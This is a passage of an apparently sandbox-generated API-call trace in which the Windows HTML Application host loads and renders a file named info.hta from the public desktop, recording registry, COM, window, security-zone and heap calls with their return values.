returned 0x6 [0223.850] RegCloseKey (hKey=0x0) returned 0x6 [0223.850] RegCloseKey (hKey=0x1b8) returned 0x0 [0223.850] RegCloseKey (hKey=0x1f0) returned 0x0 [0223.850] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\users\\public\\desktop\\info.hta", pBuffer=0x14f0b0, cbSize=0xc8, pwzMimeProposed="text/html", dwMimeFlags=0x6, ppwzMimeOut=0x14f068, dwReserved=0x0 | out: ppwzMimeOut=0x14f068*="text/html") returned 0x0 [0223.850] CoTaskMemFree (pv=0x533718) [0223.850] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/users/public/desktop/info.hta", pSecMgr=0x0) returned 0x1 [0223.850] StrCmpNIW (lpStr1="text/h", lpStr2="image/", nChar=6) returned 1 [0223.851] GetCurrentThreadId () returned 0xc4 [0223.851] SetEvent (hEvent=0x1dc) returned 1 [0223.851] IUnknown:Release (This=0x53c14c) returned 0x12 [0223.851] IUnknown:Release (This=0x53c65c) returned 0x1 [0223.851] IUnknown:Release (This=0x5205b0) returned 0x3 [0223.851] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.851] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.851] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.851] IUnknown:Release (This=0x53c14c) returned 0x11 [0223.851] IUnknown:Release (This=0x53c14c) returned 0x10 [0223.851] IUnknown:Release (This=0x53c14c) returned 0xf [0223.851] IUnknown:Release (This=0x5205b0) returned 0x2 [0223.851] IUnknown:Release (This=0x53c14c) returned 0xe [0223.851] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.851] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.851] CoTaskMemFree (pv=0x5505c8) [0223.851] CoTaskMemFree (pv=0x0) [0223.851] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.851] IUnknown:Release (This=0x53c14c) returned 0xd [0223.851] CoTaskMemFree (pv=0x550568) [0223.851] GetClientRect (in: hWnd=0x20158, lpRect=0x14f65c | out: lpRect=0x14f65c) returned 1 [0223.852] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x78) returned 0x521bc0 [0223.852] GetClientRect (in: hWnd=0x20158, lpRect=0x521bec | out: lpRect=0x521bec) returned 1 [0223.852] OffsetRect (in: lprc=0x521bec, dx=0, dy=0 | out: lprc=0x521bec) returned 1 [0223.852] OffsetRect (in: lprc=0x521bfc, dx=0, dy=0 | out: lprc=0x521bfc) returned 1 [0223.852] RegisterClassExW (param_1=0x14f178) returned 0xc153 [0223.852] CoCreateInstance (in: rclsid=0x7408bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7408bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7447b020 | out: ppv=0x7447b020*=0x551d88) returned 0x0 [0224.449] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x551d88, aaClassList=0x14f270*=0xc153, uSize=0x1) returned 0x0 [0224.449] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc153, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x20158, hMenu=0x0, hInstance=0x73f40000, lpParam=0x541f78) returned 0x2016c [0224.449] GetWindowLongW (hWnd=0x2016c, nIndex=-20) returned 0 [0224.449] SetWindowLongW (hWnd=0x2016c, nIndex=-21, dwNewLong=5513080) returned 0 [0224.449] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x81, wParam=0x0, lParam=0x14ee44*=5513080, plResult=0x14ecbc | out: plResult=0x14ecbc) returned 0x1 [0224.449] NtdllDefWindowProc_W () returned 0x1 [0224.449] GetCurrentThreadId () returned 0xc4 [0224.449] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.449] GetCurrentThreadId () returned 0xc4 [0224.449] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.449] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x1, wParam=0x0, lParam=0x14ee44*=5513080, plResult=0x14ecbc | out: plResult=0x14ecbc) returned 0x1 [0224.449] NtdllDefWindowProc_W () returned 0x0 [0224.449] GetCurrentThreadId () returned 0xc4 [0224.449] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.450] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x14ed08 | out: plResult=0x14ed08) returned 0x1 [0224.450] NtdllDefWindowProc_W () returned 0x0 [0224.450] GetCurrentThreadId () returned 0xc4 [0224.450] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.450] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x14ed08 | out: plResult=0x14ed08) returned 0x1 [0224.450] NtdllDefWindowProc_W () returned 0x0 [0224.450] GetCurrentThreadId () returned 0xc4 [0224.450] NtdllDefWindowProc_W () returned 0x0 [0224.450] GetClassNameW (in: hWnd=0x20158, lpClassName=0x14f278, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0224.450] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0224.450] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x551d88, fRestoreLayout=1) returned 0x0 [0224.450] SendMessageW (hWnd=0x2016c, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0224.450] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.450] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x14f12c | out: plResult=0x14f12c) returned 0x1 [0224.450] NtdllDefWindowProc_W () returned 0x3 [0224.450] GetCurrentThreadId () returned 0xc4 [0224.450] IntersectRect (in: lprcDst=0x14f4ac, lprcSrc1=0x521bec, lprcSrc2=0x521bfc | out: lprcDst=0x14f4ac) returned 1 [0224.450] EqualRect (lprc1=0x14f4ac, lprc2=0x521bec) returned 1 [0224.450] InvalidateRect (hWnd=0x2016c, lpRect=0x0, bErase=1) returned 1 [0224.450] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xf0) returned 0x555e68 [0224.450] IntersectRect (in: lprcDst=0x14f398, lprcSrc1=0x14f398, lprcSrc2=0x14f330 | out: lprcDst=0x14f398) returned 1 [0224.450] IntersectRect (in: lprcDst=0x14f398, lprcSrc1=0x14f398, lprcSrc2=0x14f330 | out: lprcDst=0x14f398) returned 1 [0224.450] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x550568 [0224.451] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x52d8f8 [0224.509] IntersectRect (in: lprcDst=0x14f1d4, lprcSrc1=0x14f1d4, lprcSrc2=0x14f1a4 | out: lprcDst=0x14f1d4) returned 1 [0224.509] IntersectRect (in: lprcDst=0x559990, lprcSrc1=0x559990, lprcSrc2=0x14f1c4 | out: lprcDst=0x559990) returned 1 [0224.509] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0224.509] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x552540 [0224.509] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x552540 | out: hHeap=0x510000) returned 1 [0224.509] SetWindowPos (hWnd=0x2016c, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0224.509] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.509] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x46, wParam=0x0, lParam=0x14f48c*=131436, plResult=0x14f328 | out: plResult=0x14f328) returned 0x1 [0224.509] NtdllDefWindowProc_W () returned 0x0 [0224.509] GetCurrentThreadId () returned 0xc4 [0224.510] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.510] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x47, wParam=0x0, lParam=0x14f48c*=131436, plResult=0x14f324 | out: plResult=0x14f324) returned 0x1 [0224.510] NtdllDefWindowProc_W () returned 0x0 [0224.510] GetCurrentThreadId () returned 0xc4 [0224.510] SetTimer (hWnd=0x2016c, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0224.510] GetFocus () returned 0x0 [0224.510] EnumChildWindows (hWndParent=0x2016c, lpEnumFunc=0x74260a73, lParam=0x14f384) returned 0 [0224.513] GetFocus () returned 0x0 [0224.513] SetFocus (hWnd=0x2016c) returned 0x0 [0224.513] NtdllDefWindowProc_W () returned 0x0 [0224.513] NtdllDefWindowProc_W () returned 0x0 [0224.513] NtdllDefWindowProc_W () returned 0x0 [0224.513] NtdllDefWindowProc_W () returned 0x0 [0224.514] NtdllDefWindowProc_W () returned 0x0 [0224.588] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0224.588] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x73eb0000 [0224.592] GetProcAddress (hModule=0x73eb0000, lpProcName="LresultFromObject") returned 0x73eb2663 [0224.592] LresultFromObject () returned 0xc04b [0225.378] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x55a940 [0225.379] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x5526f0 [0225.511] GetCurrentThreadId () returned 0xc4 [0225.513] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55a940 | out: hHeap=0x510000) returned 1 [0225.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x60) returned 0x55cae0 [0225.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x55a940 [0225.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x5600b8 [0225.525] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55cae0 | out: hHeap=0x510000) returned 1 [0225.529] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x14ed4c | out: plResult=0x14ed4c) returned 0x0 [0225.530] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0225.530] GetKeyState (nVirtKey=1) returned 0 [0225.530] GetKeyState (nVirtKey=2) returned 0 [0225.530] GetKeyState (nVirtKey=16) returned 0 [0225.530] GetKeyState (nVirtKey=17) returned 0 [0225.530] GetKeyState (nVirtKey=4) returned 0 [0225.530] GetKeyState (nVirtKey=18) returned 0 [0225.530] GetMessageTime () returned 0 [0225.530] GetMessagePos () returned 0x0 [0225.530] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x14e77c | out: plResult=0x14e77c) returned 0x0 [0225.530] GetCurrentThreadId () returned 0xc4 [0225.530] GetCurrentThreadId () returned 0xc4 [0225.530] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0225.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55fc70 | out: hHeap=0x510000) returned 1 [0225.677] GetCurrentThreadId () returned 0xc4 [0225.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55dc10 | out: hHeap=0x510000) returned 1 [0225.677] GetCurrentThreadId () returned 0xc4 [0225.677] GetCurrentThreadId () returned 0xc4 [0225.677] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x14f13c | out: plResult=0x14f13c) returned 0x1 [0225.677] NtdllDefWindowProc_W () returned 0x0 [0225.677] GetCurrentThreadId () returned 0xc4 [0225.677] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x551d88, hWnd=0x2016c, phIMC=0x14f464 | out: phIMC=0x14f464*=0x8017b) returned 0x0 [0225.677] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x551d88, hWnd=0x2016c, hIME=0x0, phPrev=0x14f464 | out: phPrev=0x14f464*=0x8017b) returned 0x0 [0225.677] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x60) returned 0x55cae0 [0225.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55cae0 | out: hHeap=0x510000) returned 1 [0225.677] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x60) returned 0x55cae0 [0225.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55cae0 | out: hHeap=0x510000) returned 1 [0225.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x552780 | out: hHeap=0x510000) returned 1 [0225.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x552750 | out: hHeap=0x510000) returned 1 [0225.678] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0225.678] GetKeyState (nVirtKey=1) returned 0 [0225.678] GetKeyState (nVirtKey=2) returned 0 [0225.678] GetKeyState (nVirtKey=16) returned 0 [0225.678] GetKeyState (nVirtKey=17) returned 0 [0225.678] GetKeyState (nVirtKey=4) returned 0 [0225.678] GetKeyState (nVirtKey=18) returned 0 [0225.678] GetMessageTime () returned 0 [0225.678] GetMessagePos () returned 0x0 [0225.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x14f14c | out: plResult=0x14f14c) returned 0x0 [0225.679] GetCurrentThreadId () returned 0xc4 [0225.679] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0225.679] GetKeyState (nVirtKey=1) returned 0 [0225.679] GetKeyState (nVirtKey=2) returned 0 [0225.679] GetKeyState (nVirtKey=16) returned 0 [0225.679] GetKeyState (nVirtKey=17) returned 0 [0225.679] GetKeyState (nVirtKey=4) returned 0 [0225.679] GetKeyState (nVirtKey=18) returned 0 [0225.679] GetMessageTime () returned 0 [0225.679] GetMessagePos () returned 0x0 [0225.679] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x14f14c | out: plResult=0x14f14c) returned 0x0 [0225.679] GetCurrentThreadId () returned 0xc4 [0225.679] IsOS (dwOS=0x25) returned 1 [0225.679] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f358 | out: phkResult=0x14f358*=0x23c) returned 0x0 [0225.679] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f35c | out: phkResult=0x14f35c*=0x240) returned 0x0 [0225.680] RegOpenKeyExW (in: hKey=0x240, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x14f318 | out: phkResult=0x14f318*=0x0) returned 0x2 [0225.680] RegOpenKeyExW (in: hKey=0x23c, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x14f318 | out: phkResult=0x14f318*=0x244) returned 0x0 [0225.680] SHRegGetValueW () returned 0x0 [0225.680] RegCloseKey (hKey=0x244) returned 0x0 [0225.680] RegCloseKey (hKey=0x0) returned 0x6 [0225.680] RegCloseKey (hKey=0x0) returned 0x6 [0225.680] RegCloseKey (hKey=0x23c) returned 0x0 [0225.680] RegCloseKey (hKey=0x240) returned 0x0 [0225.680] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x71da0000 [0225.876] GetVersionExW (in: lpVersionInformation=0x14ee64*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14ee64*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.876] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x71da0000 [0225.876] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x14f3e0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.877] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x14f440, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.878] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x552750 [0225.878] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x14f42c, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.879] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14de14 | out: ppURI=0x14de14*=0x53c4ac) returned 0x0 [0225.879] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ddec | out: ppvObject=0x14ddec*=0x53c4ac) returned 0x0 [0225.879] IUnknown:Release (This=0x53c4ac) returned 0x4 [0225.879] IUnknown:AddRef (This=0x53c4ac) returned 0x5 [0225.879] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x52) returned 0x5511a0 [0225.879] IUnknown:Release (This=0x53c4ac) returned 0x4 [0225.879] IUnknown:Release (This=0x53c4ac) returned 0x3 [0225.879] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x100) returned 0x584ca0 [0225.879] FindResourceW (hModule=0x71da0000, lpName=0x1fe, lpType=0x6) returned 0x2e084d0 [0225.879] LoadResource (hModule=0x71da0000, hResInfo=0x2e084d0) returned 0x2e2e53c [0225.879] LockResource (hResData=0x2e2e53c) returned 0x2e2e53c [0225.879] VirtualQuery (in: lpAddress=0x2e2e53c, lpBuffer=0x14efbc, dwLength=0x1c | out: lpBuffer=0x14efbc*(BaseAddress=0x2e2e000, AllocationBase=0x2b50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.879] SizeofResource (hModule=0x71da0000, hResInfo=0x2e084d0) returned 0xe6 [0225.879] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0225.879] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x584ca0, Size=0x70) returned 0x584ca0 [0225.879] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x74) returned 0x5220c0 [0225.880] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x53b378 [0225.880] RegisterDragDrop (hwnd=0x2016c, pDropTarget=0x744796cc) returned 0x0 [0225.880] GetCurrentThreadId () returned 0xc4 [0225.881] GetCurrentThreadId () returned 0xc4 [0225.881] GetCurrentThreadId () returned 0xc4 [0225.881] GetCurrentThreadId () returned 0xc4 [0225.881] GetMessageW (in: lpMsg=0x14f69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f69c) returned 1 [0225.881] TranslateMessage (lpMsg=0x14f69c) returned 0 [0225.881] DispatchMessageW (lpMsg=0x14f69c) returned 0x0 [0225.881] GetMessageW (in: lpMsg=0x14f69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f69c) returned 1 [0225.881] TranslateMessage (lpMsg=0x14f69c) returned 0 [0225.881] DispatchMessageW (lpMsg=0x14f69c) returned 0x0 [0225.881] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0225.881] KillTimer (hWnd=0x2016c, uIDEvent=0x1000) returned 1 [0225.917] IUnknown:AddRef (This=0x53c4ac) returned 0x4 [0225.917] IUri:GetScheme (in: This=0x53c4ac, pdwScheme=0x14e9d4 | out: pdwScheme=0x14e9d4*=0x9) returned 0x0 [0225.917] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14e9b4 | out: ppvObject=0x14e9b4*=0x53c4ac) returned 0x0 [0225.917] IUnknown:Release (This=0x53c4ac) returned 0x4 [0225.917] IUnknown:AddRef (This=0x53c4ac) returned 0x5 [0225.917] PathCreateFromUrlW (in: pszUrl="file:///C:/users/public/desktop/info.hta", pszPath=0x14ea08, pcchPath=0x14e9e8, dwFlags=0x0 | out: pszPath="C:\\users\\public\\desktop\\info.hta", pcchPath=0x14e9e8) returned 0x0 [0225.917] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x46) returned 0x5548b0 [0225.917] IUnknown:Release (This=0x53c4ac) returned 0x4 [0225.917] GetWindowTextW (in: hWnd=0x20158, lpString=0x14e580, nMaxCount=512 | out: lpString="") returned 0 [0225.917] NtdllDefWindowProc_W () returned 0x0 [0225.917] SetWindowTextW (hWnd=0x20158, lpString="C:\\users\\public\\desktop\\info.hta") returned 1 [0225.917] NtdllDefWindowProc_W () returned 0x1 [0225.917] IUnknown:Release (This=0x53c4ac) returned 0x3 [0225.917] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5548b0 | out: hHeap=0x510000) returned 1 [0225.917] GetCurrentThreadId () returned 0xc4 [0225.917] GetMessageW (in: lpMsg=0x14f69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f69c) returned 1 [0225.917] TranslateMessage (lpMsg=0x14f69c) returned 0 [0225.917] DispatchMessageW (lpMsg=0x14f69c) [0225.932] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f178 | out: ppu=0x14f178) returned 0x0 [0225.932] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0225.932] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0225.932] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0225.932] StrCmpNICW (lpStr1="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.932] StrStrIW (lpFirst="", lpSrch="http://www.w3.org/TR/REC-html40/strict.dtd") returned 0x0 [0225.932] StrStrIW (lpFirst="", lpSrch="DTD XHTML") returned 0x0 [0225.932] StrStrIW (lpFirst="", lpSrch="DTD HTML 4") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.932] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0225.932] StrStrIW (lpFirst="", lpSrch="DTD XHTML 1.0") returned 0x0 [0225.932] StrStrIW (lpFirst="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.932] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0225.932] StrStrIW (lpFirst="", lpSrch=" Transitional//") returned 0x0 [0225.932] StrStrIW (lpFirst="", lpSrch=" Frameset//") returned 0x0 [0225.932] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57dac0 | out: hHeap=0x510000) returned 1 [0225.932] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x34) returned 0x54f7e8 [0225.933] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e300 [0225.933] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x584730 [0225.933] GetTickCount () returned 0x20666 [0225.936] SetTimer (hWnd=0x2016c, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0225.936] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0225.936] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x54e358 [0225.937] IUnknown:AddRef (This=0x53c4ac) returned 0x4 [0225.937] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14f164, dwFlags=0x0 | out: pdwZone=0x14f164*=0xffffffff) returned 0x800c0011 [0225.937] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.937] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.937] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0225.937] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x2106, pPolicy=0x14f168, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14f168*=0x0) returned 0x0 [0225.937] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.937] IUnknown:Release (This=0x53c4ac) returned 0x3 [0225.937] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x584730 | out: hHeap=0x510000) returned 1 [0225.937] GetTickCount () returned 0x20666 [0225.963] GetTickCount () returned 0x20685 [0226.162] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57db88 | out: hHeap=0x510000) returned 1 [0226.163] GetSystemDefaultLCID () returned 0x409 [0226.163] GetVersionExW (in: lpVersionInformation=0x14f108*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x564408, dwMinorVersion=0x1f8, dwBuildNumber=0x510000, dwPlatformId=0x2000, szCSDVersion="\xdb80\x57\xf210\x14\x389e\x76f4\x138\x51\x387a\x76f4\x3734\x7714") | out: lpVersionInformation=0x14f108*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.163] GetKeyboardLayoutList (in: nBuff=32, lpList=0x14f088 | out: lpList=0x14f088) returned 1 [0226.163] GetSystemMetrics (nIndex=4096) returned 0 [0226.163] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0226.163] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0226.163] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0226.163] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0226.163] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0226.163] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0226.163] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0226.163] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0226.163] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2c) returned 0x55dc10 [0226.413] CBaseMoniker::AddRef () returned 0x2 [0226.413] IUnknown:AddRef (This=0x5205b0) returned 0x3 [0226.414] IsAsyncMoniker (pmk=0x5205b0) returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] 